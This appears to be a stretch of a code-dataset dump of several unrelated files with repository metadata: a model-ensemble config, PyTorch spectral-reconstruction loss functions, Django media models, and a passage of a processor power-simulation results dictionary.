| 306.010309 | 5,718 | 0.704444 | 16,212 | 59,366 | 2.534481 | 0.118801 | 0.506364 | 0.741366 | 0.965027 | 0.446884 | 0.419139 | 0.416924 | 0.405875 | 0.399596 | 0.395994 | 0 | 0.600094 | 0.027878 | 59,366 | 193 | 5,719 | 307.595855 | 0.111885 | 0.016525 | 0 | 0.185841 | 0 | 0.00885 | 0.017892 | 0.003479 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00885 | false | 0 | 0.035398 | 0 | 0.044248 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
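The run of `pad.hist` calls in the script above builds a stacked-background plot by hand: each call passes the cumulative sum of one more `y13_PT_*_weights` array, so every step histogram sits on top of the processes beneath it. A minimal sketch of that cumulative-weight pattern with toy bin weights (the process names and numbers below are illustrative only, not taken from the MadAnalysis samples):

```python
# Toy per-process bin weights; the real script derives these arrays
# from MadAnalysis event samples.
process_weights = [
    [1, 2, 3],  # signal
    [2, 2, 2],  # bg_vbf_0_100
    [0, 1, 4],  # bg_vbf_100_200
]

# Draw from the full stack down to the signal alone, mirroring the order
# of the pad.hist calls: each curve is the bin-wise sum of a prefix.
stacks = []
for n in range(len(process_weights), 0, -1):
    stacks.append([sum(col) for col in zip(*process_weights[:n])])

print(stacks)  # [[3, 5, 9], [3, 4, 5], [1, 2, 3]]
```

Plotting each cumulative curve as a `step` histogram reproduces the look of a stacked plot while keeping every process outline visible.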
4b8d048dccc653e740f0f9f42e336d4dff348559 | 1,626 | py | Python | src/config/en_config.py | bestfitting/instance_level_recognition | 683f021b4e65876835f028797ec28b0d1071bb45 | [
"Apache-2.0"
] | 103 | 2020-10-20T13:23:35.000Z | 2022-03-27T15:08:41.000Z | src/config/en_config.py | solomonkimunyu/instance_level_recognition | 683f021b4e65876835f028797ec28b0d1071bb45 | [
"Apache-2.0"
] | 3 | 2020-10-29T03:06:51.000Z | 2022-02-12T02:44:57.000Z | src/config/en_config.py | solomonkimunyu/instance_level_recognition | 683f021b4e65876835f028797ec28b0d1071bb45 | [
"Apache-2.0"
] | 23 | 2020-10-21T00:50:29.000Z | 2022-03-09T16:01:57.000Z | en_m4_b7_b6_b5_r152_i800 = [
    # b7
    {
        'is_20191st': False,
        'module': 'efficientnet_gem_fc_face',
        'model_name': 'class_efficientnet_b7_gem_fc_arcface2_1head',
        'out_dir': 'v2x_sgd_ls_aug3b_norm1_0918_class_efficientnet_b7_gem_fc_arcface2_1head_i736',
        'predict_epoch': '26.80',
        'img_size': 800,
        'batch_size': 4,
        'num_classes': 81313,
        'in_channels': 3,
        'preprocessing': True,
        'weight': 0.6,
    },
    # b6
    {
        'is_20191st': False,
        'module': 'efficientnet_gem_fc_face',
        'model_name': 'class_efficientnet_b6_gem_fc_arcface2_1head',
        'out_dir': 'v2x_sgd_ls_aug3b_norm1_0919_class_efficientnet_b6_gem_fc_arcface2_1head_i736',
        'predict_epoch': '21.70',
        'img_size': 800,
        'batch_size': 4,
        'num_classes': 81313,
        'in_channels': 3,
        'preprocessing': True,
        'weight': 0.2,
    },
    # b5
    {
        'is_20191st': False,
        'module': 'efficientnet_gem_fc_face',
        'model_name': 'class_efficientnet_b5_gem_fc_arcface2_1head',
        'out_dir': 'v2x_sgd_ls_aug3b_norm1_0918_class_efficientnet_b5_gem_fc_arcface2_1head_i736',
        'predict_epoch': '19.30',
        'img_size': 800,
        'batch_size': 4,
        'num_classes': 81313,
        'in_channels': 3,
        'preprocessing': True,
        'weight': 0.1,
    },
    # r152
    {
        'is_20191st': False,
        'module': 'resnet_gem_fc_face',
        'model_name': 'class_resnet152_gem_fc_arcface_1head',
        'out_dir': 'v2x_sgd_ls_aug3b_norm1_0919_class_resnet152_gem_fc_arcface_1head_i736',
        'predict_epoch': '17.90',
        'img_size': 800,
        'batch_size': 4,
        'num_classes': 81313,
        'in_channels': 3,
        'preprocessing': True,
        'weight': 0.1,
    },
] | 29.563636 | 94 | 0.675277 | 222 | 1,626 | 4.387387 | 0.274775 | 0.061602 | 0.080082 | 0.110883 | 0.917864 | 0.917864 | 0.845996 | 0.716632 | 0.716632 | 0.716632 | 0 | 0.120962 | 0.181427 | 1,626 | 55 | 95 | 29.563636 | 0.610819 | 0.001845 | 0 | 0.537037 | 0 | 0 | 0.611591 | 0.329223 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
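The `weight` fields in the config above (0.6, 0.2, 0.1, 0.1 across the four backbones) sum to 1.0, which is consistent with a weighted average of per-model scores at inference time. A hedged sketch of that combination step, with made-up score vectors — the repository's actual ensembling code is not part of this config:

```python
# Per-model ensemble weights taken from the config above (b7, b6, b5, r152).
weights = [0.6, 0.2, 0.1, 0.1]

# Hypothetical per-model class scores for a single image (illustrative only).
preds = [
    [0.2, 0.8],
    [0.4, 0.6],
    [0.5, 0.5],
    [0.3, 0.7],
]

# Weighted average over models, computed per class.
ensemble = [sum(w * p[i] for w, p in zip(weights, preds))
            for i in range(len(preds[0]))]
print(ensemble)
```

Because the weights sum to one, the combined scores stay on the same scale as the individual model outputs.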
4b951ced25384d90524e9918f71c85e35c75f75d | 7,736 | py | Python | PIRM_VIDAR_final_code/track1/tools/loss.py | contstriver/DRAN | 49ec70d1535a1a0a5839edb4b408be212644503b | [
"Apache-2.0"
] | null | null | null | PIRM_VIDAR_final_code/track1/tools/loss.py | contstriver/DRAN | 49ec70d1535a1a0a5839edb4b408be212644503b | [
"Apache-2.0"
] | null | null | null | PIRM_VIDAR_final_code/track1/tools/loss.py | contstriver/DRAN | 49ec70d1535a1a0a5839edb4b408be212644503b | [
"Apache-2.0"
] | null | null | null | #!/usr/local/bin/python
from __future__ import division
import torch
import random
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
class reconstruct_loss(nn.Module):
"""the loss between the input and synthesized input"""
def __init__(self, cie_matrix, batchsize):
super(reconstruct_loss, self).__init__()
self.cie = Variable(torch.from_numpy(cie_matrix).float().cuda(), requires_grad=False)
self.batchsize = batchsize
def forward(self, network_input, network_output):
network_output = network_output.permute(3, 2, 0, 1)
network_output = network_output.contiguous().view(-1, 31)
reconsturct_input = torch.mm(network_output,self.cie)
reconsturct_input = reconsturct_input.view(50, 50, 64, 3)
reconsturct_input = reconsturct_input.permute(2,3,1,0)
reconstruction_loss = torch.mean(torch.abs(reconsturct_input - network_input))
return reconstruction_loss
def rrmse_loss(outputs, label):
"""Computes the rrmse value"""
error = torch.abs(outputs-label)/(label + 1/65535) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss2(outputs, label):
"""Computes the rrmse value"""
zeros = torch.zeros(outputs.shape)
outputs = torch.where(outputs>1/65535,outputs,zeros.cuda())
error = torch.abs(outputs-label)/(label + 1/65535) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss3(outputs, label):
"""Computes the rrmse value"""
zeros = torch.zeros(outputs.shape)
ones = torch.ones(outputs.shape)*1/65535
twos = torch.ones(outputs.shape)*2/65535
outputs = torch.where(outputs>1/65535,outputs,zeros.cuda())
outputs = torch.where((outputs>2/65535)|(outputs<1/65535),outputs,ones.cuda())
outputs = torch.where((outputs>3/65535)|(outputs<2/65535),outputs,twos.cuda())
error = torch.abs(outputs-label)/(label + 1/65535) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss_round(outputs, label):
"""Computes the rrmse value"""
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.round(outputs)
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss_ceil(outputs, label):
"""Computes the rrmse value"""
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.ceil(outputs)-1
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss_con(outputs, label):
"""Computes the rrmse value"""
zeros = torch.zeros(outputs.shape)
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.round(torch.where(outputs>1,outputs,zeros.cuda()))
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def sid_loss(output, target):
"""For the network, the input image dimension is BxCxHxW"""
a = torch.sum(torch.sum(output* torch.log10(torch.clamp((output + 1e-3/65536)/(target + 1e-3/65536),min=1e-8)),3),2)
b = torch.sum(torch.sum(target* torch.log10(torch.clamp((target+ 1e-3/65536)/(output+ 1e-3/65536),min=1e-8)),3),2)
sid = torch.sum(torch.abs(a + b))/(target.shape[0]*target.shape[1]*target.shape[2] * target.shape[3])
return sid
def test_sid_loss(output, target):
"""For the network, the input image dimension is BxCxHxW"""
a = torch.sum(torch.sum(output* torch.log10(torch.clamp((output + 1e-3)/(target + 1e-3),min=1e-8)),3),2)
b = torch.sum(torch.sum(target* torch.log10(torch.clamp((target+ 1e-3)/(output+ 1e-3),min=1e-8)),3),2)
sid = torch.sum(torch.abs(a + b))/(target.shape[0]*target.shape[1]*target.shape[2] * target.shape[3])
return sid
def appsa_loss(output, target):
nom = torch.sum(target* output, dim=1)
denom = torch.norm(target,2,1) * torch.norm(output,2,1)
cos = torch.clamp(nom/(denom + 1e-3/65536), max=1)
appsa = torch.acos(torch.clamp(cos,min=1e-8))
appsa = torch.sum(appsa.view(-1))/(target.shape[0]*target.shape[2] * target.shape[3])
return appsa
def test_appsa_loss(output, target):
nom = torch.sum(target* output, dim=1)
denom = torch.norm(target,2,1) * torch.norm(output,2,1)
cos = torch.clamp(nom/(denom + 1e-3), max=1)
appsa = torch.acos(torch.clamp(cos,min=1e-8))
appsa = torch.sum(appsa.view(-1))/(target.shape[0]*target.shape[2] * target.shape[3])
return appsa
def tvloss(output, tv_weight):
"""Computes the total variation loss"""
diff_i = torch.sum(torch.abs(output[:, :, :, 1:] - output[:, :, :, :-1]))
diff_j = torch.sum(torch.abs(output[:, :, 1:, :] - output[:, :, :-1, :]))
tv_loss = tv_weight*(diff_i + diff_j)
return tv_loss
| 43.460674 | 120 | 0.659902 | 1,204 | 7,736 | 4.17608 | 0.089701 | 0.050915 | 0.041368 | 0.041169 | 0.83572 | 0.825378 | 0.818815 | 0.818815 | 0.818815 | 0.806086 | 0 | 0.071451 | 0.164168 | 7,736 | 177 | 121 | 43.706215 | 0.706155 | 0.093588 | 0 | 0.807407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155556 | false | 0 | 0.044444 | 0 | 0.355556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
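All the `rrmse_loss*` variants above reduce to the same relative-error formula, `mean(|outputs - label| / (label + eps))`, differing only in how `outputs` is quantized first; `eps = 1/65535` is one step of a 16-bit intensity scale. A plain-Python sketch of the core formula, without the torch tensor machinery:

```python
def rrmse(outputs, labels, eps=1 / 65535):
    """Mean relative absolute error, mirroring rrmse_loss above (plain lists)."""
    errors = [abs(o - l) / (l + eps) for o, l in zip(outputs, labels)]
    return sum(errors) / len(errors)

# One value off by 1.0 against a label of 2.0, one exact match:
# the mean relative error is just under 0.25.
print(rrmse([1.0, 2.0], [2.0, 2.0]))
```

The `eps` term in the denominator keeps the metric finite for zero-valued labels, at the cost of inflating errors on near-black pixels.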
29e38561d157f63e390191afb73027bfd7af6f4a | 2,143 | py | Python | ideas/models.py | Adstefnum/ScrapBook | 8391e86daf678f64a30dd693e34cd69939b6fe0d | [
"MIT"
] | null | null | null | ideas/models.py | Adstefnum/ScrapBook | 8391e86daf678f64a30dd693e34cd69939b6fe0d | [
"MIT"
] | null | null | null | ideas/models.py | Adstefnum/ScrapBook | 8391e86daf678f64a30dd693e34cd69939b6fe0d | [
"MIT"
] | null | null | null | from django.db import models
from django.core.files.storage import FileSystemStorage
CAT_CHOICES = (
('tech','TECH'),
('class_mus','CLASSICAL MUSIC'),
('gen','GENERAL'),
('gen_music','GENERAL MUSIC'),
('novels','NOVELS'),
('physics','PHYSICS'),
('maths','MATHS'),
)
class Video(models.Model):
file_pic = models.FileField(storage=FileSystemStorage(location='/media/image/'),upload_to='image',default='/media/image/')
cat_name = models.CharField(max_length=30, choices=CAT_CHOICES, default='notes')
file_name = models.CharField(max_length=100)
file = models.FileField(storage=FileSystemStorage(location='/media/video/'),upload_to='video',default='/media/video/')
last_date = models.DateField()
def __str__(self):
return self.file_name
class Audio(models.Model):
file_pic = models.FileField(storage=FileSystemStorage(location='/media/image/'),upload_to='image',default='/media/image/')
cat_name = models.CharField(max_length=30, choices=CAT_CHOICES, default='notes')
file_name = models.CharField(max_length=100)
file = models.FileField(storage=FileSystemStorage(location='/media/audio/'),upload_to='audio')
last_date = models.DateField()
def __str__(self):
return self.file_name
class Image(models.Model):
file_pic = models.FileField(storage=FileSystemStorage(location='/media/image/'),upload_to='image',default='/media/image/')
cat_name = models.CharField(max_length=30, choices=CAT_CHOICES, default='notes')
file_name = models.CharField(max_length=100)
file = models.FileField(storage=FileSystemStorage(location='/media/images/'),upload_to='images')
last_date = models.DateField()
def __str__(self):
return self.file_name
class Note(models.Model):
file_pic = models.FileField(storage=FileSystemStorage(location='/media/image/'),upload_to='image',default='/media/image/')
cat_name = models.CharField(max_length=30, choices=CAT_CHOICES, default='notes')
file_name = models.CharField(max_length=100)
file = models.FileField(storage=FileSystemStorage(location='/media/notes/'),upload_to='notes')
last_date = models.DateField()
def __str__(self):
return self.file_name | 38.267857 | 123 | 0.748483 | 275 | 2,143 | 5.618182 | 0.178182 | 0.07767 | 0.113916 | 0.201942 | 0.809709 | 0.809709 | 0.809709 | 0.809709 | 0.809709 | 0.809709 | 0 | 0.010256 | 0.090061 | 2,143 | 56 | 124 | 38.267857 | 0.782051 | 0 | 0 | 0.55814 | 0 | 0 | 0.154384 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0 | 0.046512 | 0.093023 | 0.790698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
d9a9b5e70d454db4f3bd6755d13b70999d6b1425 | 68,637 | py | Python | benchmarks/SimResults/combinations_spec_ml_fulltrained/old/cmp_bwavesgcccactusADMmilc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml_fulltrained/old/cmp_bwavesgcccactusADMmilc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml_fulltrained/old/cmp_bwavesgcccactusADMmilc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.134375,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.308232,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.791398,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.347161,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.601157,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.34478,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.2931,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.221822,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.68559,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.149512,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0125848,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.138639,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0930726,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.288151,
'Execution Unit/Register Files/Runtime Dynamic': 0.105657,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.371823,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.911432,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.0238,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000824659,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000824659,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000720848,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000280459,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.001337,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00370716,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00781487,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0894731,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.69125,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.234878,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.303891,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.1902,
'Instruction Fetch Unit/Runtime Dynamic': 0.639764,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0752046,
'L2/Runtime Dynamic': 0.0190957,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.6102,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.64725,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.109127,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.109127,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.12762,
'Load Store Unit/Runtime Dynamic': 2.29455,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.269089,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.538177,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0955005,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.096578,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.353861,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0386585,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.677462,
'Memory Management Unit/Runtime Dynamic': 0.135237,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.3178,
